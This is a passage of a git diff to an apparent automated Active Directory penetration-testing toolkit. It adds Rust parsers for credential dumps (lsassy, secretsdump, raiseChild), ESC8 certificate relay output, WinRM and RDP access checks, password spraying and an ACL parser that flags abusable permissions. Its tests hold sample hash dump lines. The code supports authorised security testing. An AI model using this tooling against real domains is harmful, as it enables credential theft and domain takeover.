let Some(stripped) = rest.strip_prefix(':') { + let secret = stripped.trim(); + if !secret.is_empty() { + return Some((domain.to_string(), username.to_string(), secret.to_string())); + } + } + + // Whitespace-separated (DOMAIN\user secret). + let secret = rest.trim(); + if !secret.is_empty() { + // Take only the first whitespace-delimited token to avoid swallowing + // trailing `[SHA1] …` decorations into the password. + let first = secret.split_whitespace().next().unwrap_or(""); + if !first.is_empty() { + return Some((domain.to_string(), username.to_string(), first.to_string())); } } + None } +/// Validate a DOMAIN string looks like an AD domain prefix, not garbage. +fn is_clean_domain(d: &str) -> bool { + !d.is_empty() + && d.len() < 64 + && d.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') + && d.chars() + .next() + .map(|c| c.is_ascii_alphanumeric()) + .unwrap_or(false) +} + fn looks_like_ntlm_hash(s: &str) -> bool { // NTLM hash: 32 hex chars, or LM:NT format (32:32) let s = s.trim(); @@ -577,4 +654,83 @@ _msdcs.contoso.local. CNAME dc01.contoso.local."; assert_eq!(creds[0]["username"], "alice"); assert_eq!(creds[0]["password"], "Password123"); } + + #[test] + fn lsassy_handles_nxc_prefix_with_nt_hash_marker() { + // Real lsassy-via-nxc line format: a transport prefix, then the + // credential block. Domain prefix appears mid-line, not at the start. + let output = "\ +SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\\Administrator [NT] 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1, "should pick up the [NT] hash"); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["username"], "Administrator"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_strips_real_ansi_escape_sequences() { + // Real ANSI from the wire — the parser must not see them. + let output = + "\x1b[1;33mCONTOSO\\alice\x1b[0m \x1b[1;32m[NT]\x1b[0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + } + + #[test] + fn lsassy_strips_bare_text_ansi_leftovers() { + // When ESC bytes are stripped during transport, the visible style + // codes (`[1;33m`, `[0m`) survive as bare text. Strip them too. + let output = "[1;33mCONTOSO\\alice[0m [1;32m[NT][0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_rejects_garbage_domain_from_naive_first_backslash() { + // The pre-fix bug: nxc prefix has no backslash, but `contoso.local\Administrator:HASH` + // sits in the line. Naive first-backslash parsing wrongly stuffed the + // entire prefix ("SMB ... DC01 [+] contoso.local") into `domain`. + // The fix must extract a clean domain ("contoso.local") instead. + let output = "\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[0]["username"], "Administrator"); + } + + #[test] + fn lsassy_rejects_path_like_backslashes() { + // Backslashes in Windows paths shouldn't be treated as DOMAIN\user. + // The token after `\` here is empty / has no secret following. + let output = "[*] Loading file C:\\Windows\\Temp\\dump.dmp"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert!(hashes.is_empty()); + assert!(creds.is_empty()); + } + + #[test] + fn lsassy_does_not_swallow_sha1_decoration_into_password() { + // Whitespace-separated form with `[SHA1] …` trailing decoration. + // The parser should pick the NT hash, not concatenate the rest. + let output = "CONTOSO\\bob 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } } diff --git a/ares-tools/src/parsers/mod.rs b/ares-tools/src/parsers/mod.rs index 291ec55a..3f11668b 100644 --- a/ares-tools/src/parsers/mod.rs +++ b/ares-tools/src/parsers/mod.rs @@ -10,6 +10,7 @@ mod credential_tools; mod delegation; mod mssql; mod nmap; +mod ntsd; mod secrets; mod smb; mod spider; @@ -27,6 +28,7 @@ pub use credential_tools::{ pub use delegation::{extract_delegation_account, parse_delegation}; pub use mssql::{parse_mssql_impersonation, parse_mssql_linked_servers}; pub use nmap::{flush_nmap_host, parse_nmap_output}; +pub use ntsd::parse_acl_enumeration; pub use secrets::{parse_asrep_roast, parse_kerberoast, parse_secretsdump}; pub use smb::{parse_netexec_smb, parse_smb_signing}; pub use spider::parse_spider_credentials; @@ -88,7 +90,11 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value "run_bloodhound" => { // BloodHound collection doesn't produce immediate discoveries } - "secretsdump" | "secretsdump_kerberos" => { + "secretsdump" | "secretsdump_kerberos" | "forge_inter_realm_and_dump" => { + // forge_inter_realm_and_dump runs ticketer + secretsdump in one + // call. The orchestrator passes `target_domain` so secretsdump + // hashes get attributed to the dumped (target/parent) realm, + // not the forging (source/child) realm. let (hashes, creds) = parse_secretsdump(output, params); if !hashes.is_empty() { discoveries["hashes"] = Value::Array(hashes); @@ -97,6 +103,32 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "raise_child" => { + // raiseChild.py performs the parent-domain NTDS dump in standard + // secretsdump format (lines like "domain.local/user:RID:LM:NT:::" + // or "DOMAIN\\user:RID:..."). Derive parent FQDN from child_domain + // and pass as target_domain so bare-username lines and NetBIOS + // prefixes get attributed to the parent forest root. + let child_domain = params + .get("child_domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let parent_domain = child_domain + .split_once('.') + .map(|(_, rest)| rest) + .unwrap_or(child_domain); + let mut params_with_target = params.clone(); + if let Some(obj) = params_with_target.as_object_mut() { + obj.insert("target_domain".into(), json!(parent_domain)); + } + let (hashes, creds) = parse_secretsdump(output, ¶ms_with_target); + if !hashes.is_empty() { + discoveries["hashes"] = Value::Array(hashes); + } + if !creds.is_empty() { + discoveries["credentials"] = Value::Array(creds); + } + } "kerberoast" => { let hashes = parse_kerberoast(output, params); if !hashes.is_empty() { @@ -177,7 +209,7 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } - "password_spray" => { + "password_spray" | "smb_login_check" => { let creds = parse_spray_success(output, params); if !creds.is_empty() { discoveries["credentials"] = Value::Array(creds); @@ -244,6 +276,145 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "ldap_acl_enumeration" => { + let vulns = parse_acl_enumeration(output, params); + if !vulns.is_empty() { + discoveries["vulnerabilities"] = Value::Array(vulns); + } + } + "password_policy" => { + // Extract password policy details as a vulnerability/info finding. + // netexec smb --pass-pol output includes lockout threshold, min length, etc. + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if !output.is_empty() && !domain.is_empty() { + // Parse lockout threshold from the output + let lockout_threshold = output + .lines() + .find(|l| l.to_lowercase().contains("account lockout threshold")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let min_length = output + .lines() + .find(|l| l.to_lowercase().contains("minimum password length")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let mut details = serde_json::Map::new(); + details.insert("domain".into(), json!(domain)); + details.insert("target_ip".into(), json!(target)); + if let Some(ref lt) = lockout_threshold { + details.insert("lockout_threshold".into(), json!(lt)); + } + if let Some(ref ml) = min_length { + details.insert("min_password_length".into(), json!(ml)); + } + details.insert( + "description".into(), + json!(format!("Password policy enumerated for {domain}")), + ); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("password_policy_{}", domain.replace('.', "_")), + "vuln_type": "password_policy", + "target": target, + "details": details, + }]); + } + } + "evil_winrm" => { + // Detect successful WinRM connection from evil-winrm output. + // A successful connection typically shows "Evil-WinRM shell" or + // output from executed commands (e.g., "whoami" returning a username). + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if output.contains("Evil-WinRM") + || output.contains("\\") // whoami output like DOMAIN\user + || output.contains("PS >") + { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("winrm_access_{}", target.replace('.', "_")), + "vuln_type": "winrm_access", + "target": target, + "details": { + "description": format!("WinRM access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } + "relay_and_coerce" => { + // Composite ESC8 tool prints `PFX_FILE=...` and `RELAYED_USER=...` + // markers when the cert is captured. Convert to a + // `certificate_obtained` vuln so `auto_certipy_auth` picks it up. + let pfx_path = output + .lines() + .find_map(|l| l.trim().strip_prefix("PFX_FILE=")) + .map(str::trim); + let relayed_user = output + .lines() + .find_map(|l| l.trim().strip_prefix("RELAYED_USER=")) + .map(str::trim); + + if let Some(pfx) = pfx_path { + // Cert is for the target DC's realm (the relayed identity's + // home), not the coercion credential's domain. Caller passes + // `target_domain` for cross-forest cases; fall back to + // `coerce_domain` for same-forest. + let target_domain = params + .get("target_domain") + .and_then(|v| v.as_str()) + .or_else(|| params.get("coerce_domain").and_then(|v| v.as_str())) + .unwrap_or(""); + let coerce_target = params + .get("coerce_target") + .and_then(|v| v.as_str()) + .or_else(|| params.get("target_dc").and_then(|v| v.as_str())) + .unwrap_or(""); + let user = relayed_user.unwrap_or(""); + let mut details = serde_json::Map::new(); + details.insert("pfx_path".into(), json!(pfx)); + if !target_domain.is_empty() { + details.insert("domain".into(), json!(target_domain)); + } + if !user.is_empty() { + details.insert("target_user".into(), json!(user)); + details.insert("account_name".into(), json!(user)); + } + if !coerce_target.is_empty() { + details.insert("target_ip".into(), json!(coerce_target)); + } + details.insert("source".into(), json!("relay_and_coerce")); + details.insert( + "description".into(), + json!(format!( + "ESC8 relay captured certificate for {user} in {target_domain}" + )), + ); + let user_safe = user.replace(['$', '.'], "_"); + let domain_safe = target_domain.replace('.', "_"); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("certificate_obtained_{user_safe}_{domain_safe}"), + "vuln_type": "certificate_obtained", + "target": coerce_target, + "details": details, + }]); + } + } + "xfreerdp" => { + // Detect successful RDP authentication from xfreerdp output. + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + // xfreerdp success: shows "Authentication only" or specific success patterns + let success = output.contains("Authentication only, exit status 0") + || (output.contains("connected to") && !output.contains("ERRCONNECT")) + || output.contains("FREERDP_CB_SESSION_STARTED"); + if success { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("rdp_access_{}", target.replace('.', "_")), + "vuln_type": "rdp_access", + "target": target, + "details": { + "description": format!("RDP access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } _ => {} } @@ -626,6 +797,28 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert!(!disc["hashes"].as_array().unwrap().is_empty()); } + #[test] + fn parse_tool_output_raise_child_attributes_to_parent() { + // raise_child dumps the parent NTDS in slash-separated FQDN format. + // Parser must derive parent_domain from child_domain and attribute hashes there. + let output = "\ +[*] Forest is contoso.local +contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: +contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::"; + let params = json!({ + "child_domain": "child.contoso.local", + "username": "testuser", + "password": "REDACTED", + }); + let disc = parse_tool_output("raise_child", output, ¶ms); + let hashes = disc["hashes"].as_array().expect("hashes array"); + assert_eq!(hashes.len(), 2); + assert_eq!(hashes[0]["username"], "krbtgt"); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[1]["username"], "Administrator"); + assert_eq!(hashes[1]["domain"], "contoso.local"); + } + #[test] fn parse_tool_output_kerberoast() { let output = "$krb5tgs$23$*svc_sql$CONTOSO$contoso.local/svc_sql*$abc"; @@ -711,6 +904,75 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert_eq!(td.len(), 1, "Duplicate trusted domains should be deduped"); } + #[test] + fn parse_tool_output_relay_and_coerce_emits_cert_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + CERT_CAPTURED_VIA=MS-DFSNM\n\ + PFX_FILE=/tmp/ares_relay_999/DC01$.pfx\n\ + RELAYED_USER=DC01$\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "target_domain": "contoso.local", + "coerce_domain": "child.contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().expect("vulns array"); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "certificate_obtained"); + assert_eq!( + vulns[0]["details"]["pfx_path"], + "/tmp/ares_relay_999/DC01$.pfx" + ); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + assert_eq!(vulns[0]["details"]["target_user"], "DC01$"); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_no_capture_no_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + === Coercing via MS-EFSR ===\n\ + === Coercing via MS-RPRN ===\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({"ca_host": "192.168.58.10", "coerce_target": "192.168.58.20"}); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + assert!(disc.get("vulnerabilities").is_none()); + } + + #[test] + fn parse_tool_output_relay_and_coerce_falls_back_to_coerce_domain() { + // Same-forest case: only coerce_domain present. + let output = "PFX_FILE=/tmp/ares_relay_1/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_legacy_target_dc_alias() { + // Backwards-compat: orchestrator state may still emit `target_dc`. + let output = "PFX_FILE=/tmp/ares_relay_2/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "target_dc": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + #[test] fn parse_tool_output_smb_signing_check() { let output = "SMB 192.168.58.10 445 DC01 signing:True"; diff --git a/ares-tools/src/parsers/ntsd.rs b/ares-tools/src/parsers/ntsd.rs new file mode 100644 index 00000000..8f5d527b --- /dev/null +++ b/ares-tools/src/parsers/ntsd.rs @@ -0,0 +1,759 @@ +//! nTSecurityDescriptor binary parser. +//! +//! Parses Windows SECURITY_DESCRIPTOR binary data (self-relative format) from +//! LDAP nTSecurityDescriptor attribute values to extract DACL ACE entries. +//! Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, etc.) +//! and returns them as structured vulnerability discoveries. + +use serde_json::{json, Value}; + +// ── Well-known SID prefixes ──────────────────────────────────────────────── + +/// Map well-known SIDs to friendly names. +fn well_known_sid(sid: &str) -> Option<&'static str> { + match sid { + "S-1-0-0" => Some("Nobody"), + "S-1-1-0" => Some("Everyone"), + "S-1-5-7" => Some("ANONYMOUS LOGON"), + "S-1-5-10" => Some("SELF"), + "S-1-5-11" => Some("Authenticated Users"), + "S-1-5-18" => Some("SYSTEM"), + "S-1-5-32-544" => Some("BUILTIN\\Administrators"), + "S-1-5-32-545" => Some("BUILTIN\\Users"), + _ => None, + } +} + +// ── Access mask flags ────────────────────────────────────────────────────── + +const GENERIC_ALL: u32 = 0x10000000; +const GENERIC_WRITE: u32 = 0x40000000; +const ADS_RIGHT_DS_CONTROL_ACCESS: u32 = 0x00000100; +const ADS_RIGHT_DS_WRITE_PROP: u32 = 0x00000020; +const ADS_RIGHT_DS_SELF: u32 = 0x00000008; +const WRITE_DACL: u32 = 0x00040000; +const WRITE_OWNER: u32 = 0x00080000; +const FULL_CONTROL: u32 = 0x000F01FF; + +// ── Object type GUIDs for extended rights ────────────────────────────────── + +/// User-Force-Change-Password (Reset Password extended right) +const GUID_FORCE_CHANGE_PASSWORD: &str = "00299570-246d-11d0-a768-00aa006e0529"; +/// Self-Membership (validated write to group member attribute) +const GUID_SELF_MEMBERSHIP: &str = "bf9679c0-0de6-11d0-a285-00aa003049e2"; +/// Write-Member (write to member attribute on group) +const GUID_WRITE_MEMBER: &str = "bf9679a8-0de6-11d0-a285-00aa003049e2"; +/// All Extended Rights +#[allow(dead_code)] +const GUID_ALL_EXTENDED_RIGHTS: &str = "00000000-0000-0000-0000-000000000000"; + +// ── Binary parsing helpers ───────────────────────────────────────────────── + +fn read_u8(data: &[u8], offset: usize) -> Option { + data.get(offset).copied() +} + +fn read_u16_le(data: &[u8], offset: usize) -> Option { + if offset + 2 > data.len() { + return None; + } + Some(u16::from_le_bytes([data[offset], data[offset + 1]])) +} + +fn read_u32_le(data: &[u8], offset: usize) -> Option { + if offset + 4 > data.len() { + return None; + } + Some(u32::from_le_bytes([ + data[offset], + data[offset + 1], + data[offset + 2], + data[offset + 3], + ])) +} + +/// Parse a SID from binary data at the given offset. +/// Returns (sid_string, bytes_consumed). +fn parse_sid(data: &[u8], offset: usize) -> Option<(String, usize)> { + let revision = read_u8(data, offset)?; + let sub_authority_count = read_u8(data, offset + 1)? as usize; + + if offset + 8 + sub_authority_count * 4 > data.len() { + return None; + } + + // IdentifierAuthority is 6 bytes big-endian + let auth_bytes = &data[offset + 2..offset + 8]; + let authority = if auth_bytes[0] == 0 && auth_bytes[1] == 0 { + // Fits in a u32 — use the last 4 bytes + u32::from_be_bytes([auth_bytes[2], auth_bytes[3], auth_bytes[4], auth_bytes[5]]) as u64 + } else { + // Full 48-bit authority + ((auth_bytes[0] as u64) << 40) + | ((auth_bytes[1] as u64) << 32) + | ((auth_bytes[2] as u64) << 24) + | ((auth_bytes[3] as u64) << 16) + | ((auth_bytes[4] as u64) << 8) + | (auth_bytes[5] as u64) + }; + + let mut sid = format!("S-{revision}-{authority}"); + for i in 0..sub_authority_count { + let sub_auth = read_u32_le(data, offset + 8 + i * 4)?; + sid.push_str(&format!("-{sub_auth}")); + } + + let consumed = 8 + sub_authority_count * 4; + Some((sid, consumed)) +} + +/// Parse a GUID from 16 bytes in mixed-endian format (as stored in AD). +fn parse_guid(data: &[u8], offset: usize) -> Option { + if offset + 16 > data.len() { + return None; + } + let d1 = read_u32_le(data, offset)?; + let d2 = read_u16_le(data, offset + 4)?; + let d3 = read_u16_le(data, offset + 6)?; + let d4 = &data[offset + 8..offset + 16]; + Some(format!( + "{:08x}-{:04x}-{:04x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}", + d1, d2, d3, d4[0], d4[1], d4[2], d4[3], d4[4], d4[5], d4[6], d4[7] + )) +} + +// ── ACE types ────────────────────────────────────────────────────────────── + +const ACCESS_ALLOWED_ACE_TYPE: u8 = 0x00; +const ACCESS_ALLOWED_OBJECT_ACE_TYPE: u8 = 0x05; + +/// A parsed ACE with the information we care about. +#[derive(Debug)] +struct ParsedAce { + trustee_sid: String, + access_mask: u32, + object_type_guid: Option, +} + +/// Classify an ACE into a vulnerability type name, if it's dangerous. +fn classify_ace(ace: &ParsedAce) -> Vec<&'static str> { + let mask = ace.access_mask; + let mut types = Vec::new(); + + // GenericAll — full control + if mask & GENERIC_ALL != 0 || mask == FULL_CONTROL { + types.push("genericall"); + return types; // GenericAll subsumes everything + } + + // GenericWrite + if mask & GENERIC_WRITE != 0 { + types.push("genericwrite"); + } + + // WriteDacl + if mask & WRITE_DACL != 0 { + types.push("writedacl"); + } + + // WriteOwner + if mask & WRITE_OWNER != 0 { + types.push("writeowner"); + } + + // Object-type specific rights + if let Some(ref guid) = ace.object_type_guid { + let guid_lower = guid.to_lowercase(); + if guid_lower == GUID_FORCE_CHANGE_PASSWORD && (mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0) { + types.push("forcechangepassword"); + } + if guid_lower == GUID_SELF_MEMBERSHIP && (mask & ADS_RIGHT_DS_SELF != 0) { + types.push("self_membership"); + } + if guid_lower == GUID_WRITE_MEMBER && (mask & ADS_RIGHT_DS_WRITE_PROP != 0) { + types.push("write_membership"); + } + } + + // AllExtendedRights (no object type restriction or null GUID) + if mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0 && ace.object_type_guid.is_none() { + types.push("allextendedrights"); + } + + // WriteProperty with no specific object type + if mask & ADS_RIGHT_DS_WRITE_PROP != 0 { + if let Some(ref guid) = ace.object_type_guid { + if guid.to_lowercase() != GUID_WRITE_MEMBER { + types.push("writeproperty"); + } + } else { + types.push("writeproperty"); + } + } + + types +} + +/// Parse a single ACE from binary data. +/// Returns (ParsedAce, total_ace_size). +fn parse_ace(data: &[u8], offset: usize) -> Option<(ParsedAce, usize)> { + let ace_type = read_u8(data, offset)?; + let _ace_flags = read_u8(data, offset + 1)?; + let ace_size = read_u16_le(data, offset + 2)? as usize; + + if offset + ace_size > data.len() || ace_size < 8 { + return None; + } + + match ace_type { + ACCESS_ALLOWED_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let (sid, _) = parse_sid(data, offset + 8)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid: None, + }, + ace_size, + )) + } + ACCESS_ALLOWED_OBJECT_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let flags = read_u32_le(data, offset + 8)?; + + let mut guid_offset = offset + 12; + let object_type_guid = if flags & 0x01 != 0 { + let guid = parse_guid(data, guid_offset)?; + guid_offset += 16; + Some(guid) + } else { + None + }; + + // Skip InheritedObjectType if present + if flags & 0x02 != 0 { + guid_offset += 16; + } + + let (sid, _) = parse_sid(data, guid_offset)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid, + }, + ace_size, + )) + } + _ => { + // Skip unknown ACE types + Some(( + ParsedAce { + trustee_sid: String::new(), + access_mask: 0, + object_type_guid: None, + }, + ace_size, + )) + } + } +} + +/// Parse a SECURITY_DESCRIPTOR in self-relative format and extract DACL ACEs. +/// +/// Returns a list of (trustee_sid, vuln_type) pairs for dangerous ACEs. +pub fn parse_security_descriptor(data: &[u8]) -> Vec<(String, String)> { + if data.len() < 20 { + return Vec::new(); + } + + let _revision = read_u8(data, 0); + let _sbz1 = read_u8(data, 1); + let control = read_u16_le(data, 2).unwrap_or(0); + + // Check SE_DACL_PRESENT (bit 2) + if control & 0x0004 == 0 { + return Vec::new(); + } + + // SE_SELF_RELATIVE check (bit 15) — we only handle self-relative + if control & 0x8000 == 0 { + return Vec::new(); + } + + let dacl_offset = read_u32_le(data, 16).unwrap_or(0) as usize; + if dacl_offset == 0 || dacl_offset >= data.len() { + return Vec::new(); + } + + // DACL header: Revision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2) + if dacl_offset + 8 > data.len() { + return Vec::new(); + } + + let ace_count = read_u16_le(data, dacl_offset + 4).unwrap_or(0) as usize; + + let mut results = Vec::new(); + let mut ace_offset = dacl_offset + 8; // skip ACL header + + for _ in 0..ace_count { + if ace_offset >= data.len() { + break; + } + match parse_ace(data, ace_offset) { + Some((ace, size)) => { + if !ace.trustee_sid.is_empty() { + for vuln_type in classify_ace(&ace) { + results.push((ace.trustee_sid.clone(), vuln_type.to_string())); + } + } + ace_offset += size; + } + None => break, + } + } + + results +} + +/// Parse ldapsearch output containing base64-encoded nTSecurityDescriptor values. +/// +/// Expects output in ldapsearch format: +/// ```text +/// dn: CN=someuser,DC=contoso,DC=local +/// sAMAccountName: someuser +/// nTSecurityDescriptor:: +/// ``` +/// +/// Returns vulnerability discoveries as JSON values. +pub fn parse_acl_enumeration(output: &str, params: &Value) -> Vec { + use std::collections::HashMap; + + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target_ip = params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + // Build a SID → sAMAccountName map from the output itself + let mut sid_to_name: HashMap = HashMap::new(); + let mut vulns = Vec::new(); + + // First pass: collect all objects with their sAMAccountName and objectSid + struct LdapObject { + sam_account_name: String, + object_class: String, // user, group, computer + ntsd_base64: String, + object_sid: String, + } + + let mut objects: Vec = Vec::new(); + let mut current = LdapObject { + sam_account_name: String::new(), + object_class: String::new(), + ntsd_base64: String::new(), + object_sid: String::new(), + }; + let mut in_ntsd = false; + let mut ntsd_buf = String::new(); + + for line in output.lines() { + let line = line.trim_end(); + + if line.starts_with("dn: ") || (line.is_empty() && !current.sam_account_name.is_empty()) { + // Flush current + if in_ntsd { + current.ntsd_base64 = ntsd_buf.clone(); + in_ntsd = false; + ntsd_buf.clear(); + } + if !current.sam_account_name.is_empty() { + objects.push(current); + } + current = LdapObject { + sam_account_name: String::new(), + object_class: String::new(), + ntsd_base64: String::new(), + object_sid: String::new(), + }; + continue; + } + + // Handle base64 continuation lines (start with space) + if in_ntsd { + if line.starts_with(' ') { + ntsd_buf.push_str(line.trim()); + continue; + } else { + current.ntsd_base64 = ntsd_buf.clone(); + in_ntsd = false; + ntsd_buf.clear(); + } + } + + if let Some(val) = line.strip_prefix("sAMAccountName: ") { + current.sam_account_name = val.trim().to_string(); + } else if let Some(val) = line.strip_prefix("objectClass: ") { + let val = val.trim().to_lowercase(); + // Keep the most specific class + if val == "user" || val == "computer" || val == "group" { + current.object_class = val; + } + } else if let Some(val) = line.strip_prefix("objectSid:: ") { + // Base64-encoded SID + if let Ok(bytes) = base64_decode(val.trim()) { + if let Some((sid, _)) = parse_sid(&bytes, 0) { + current.object_sid = sid; + } + } + } else if let Some(val) = line.strip_prefix("objectSid: ") { + // String SID + current.object_sid = val.trim().to_string(); + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor:: ") { + ntsd_buf = val.trim().to_string(); + in_ntsd = true; + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor: ") { + // Non-base64 (shouldn't happen but handle it) + current.ntsd_base64 = val.trim().to_string(); + } + } + // Flush last object + if in_ntsd { + current.ntsd_base64 = ntsd_buf; + } + if !current.sam_account_name.is_empty() { + objects.push(current); + } + + // Build SID map + for obj in &objects { + if !obj.object_sid.is_empty() && !obj.sam_account_name.is_empty() { + sid_to_name.insert(obj.object_sid.clone(), obj.sam_account_name.clone()); + } + } + + // Second pass: parse each nTSecurityDescriptor and extract dangerous ACEs + for obj in &objects { + if obj.ntsd_base64.is_empty() { + continue; + } + + let sd_bytes = match base64_decode(&obj.ntsd_base64) { + Ok(b) => b, + Err(_) => continue, + }; + + let aces = parse_security_descriptor(&sd_bytes); + for (trustee_sid, vuln_type) in &aces { + // Resolve trustee SID to name + let source_name = sid_to_name + .get(trustee_sid) + .map(|s| s.as_str()) + .or_else(|| well_known_sid(trustee_sid)) + .unwrap_or(trustee_sid); + + // Skip well-known system SIDs and high-privilege groups that aren't + // actionable (you'd already need DA to abuse them). + let source_lower = source_name.to_lowercase(); + if matches!( + source_name, + "SYSTEM" + | "BUILTIN\\Administrators" + | "BUILTIN\\Users" + | "SELF" + | "Nobody" + | "ANONYMOUS LOGON" + ) || source_lower == "administrators" + || source_lower == "domain admins" + || source_lower == "enterprise admins" + || source_lower == "key admins" + || source_lower == "enterprise key admins" + || source_lower == "account operators" + || source_lower == "domain controllers" + || source_lower == "enterprise domain controllers" + { + continue; + } + + // Skip if source == target (self-permissions) + if source_name.eq_ignore_ascii_case(&obj.sam_account_name) { + continue; + } + + let target_type = match obj.object_class.as_str() { + "user" => "User", + "group" => "Group", + "computer" => "Computer", + _ => "Unknown", + }; + + let vuln_id = format!( + "acl_{}_{}_{}", + vuln_type, + source_name.to_lowercase().replace(' ', "_"), + obj.sam_account_name.to_lowercase().replace('$', "") + ); + + vulns.push(json!({ + "vuln_id": vuln_id, + "vuln_type": vuln_type, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "target_ip": target_ip, + "domain": domain, + "source_domain": domain, + "details": { + "trustee_sid": trustee_sid, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "domain": domain, + "source_domain": domain, + "description": format!( + "{} has {} on {} ({})", + source_name, vuln_type, obj.sam_account_name, target_type + ), + }, + })); + } + } + + vulns +} + +/// Simple base64 decoder (no external dependency). +fn base64_decode(input: &str) -> Result, &'static str> { + // Strip whitespace + let clean: String = input.chars().filter(|c| !c.is_whitespace()).collect(); + if clean.is_empty() { + return Ok(Vec::new()); + } + + let mut output = 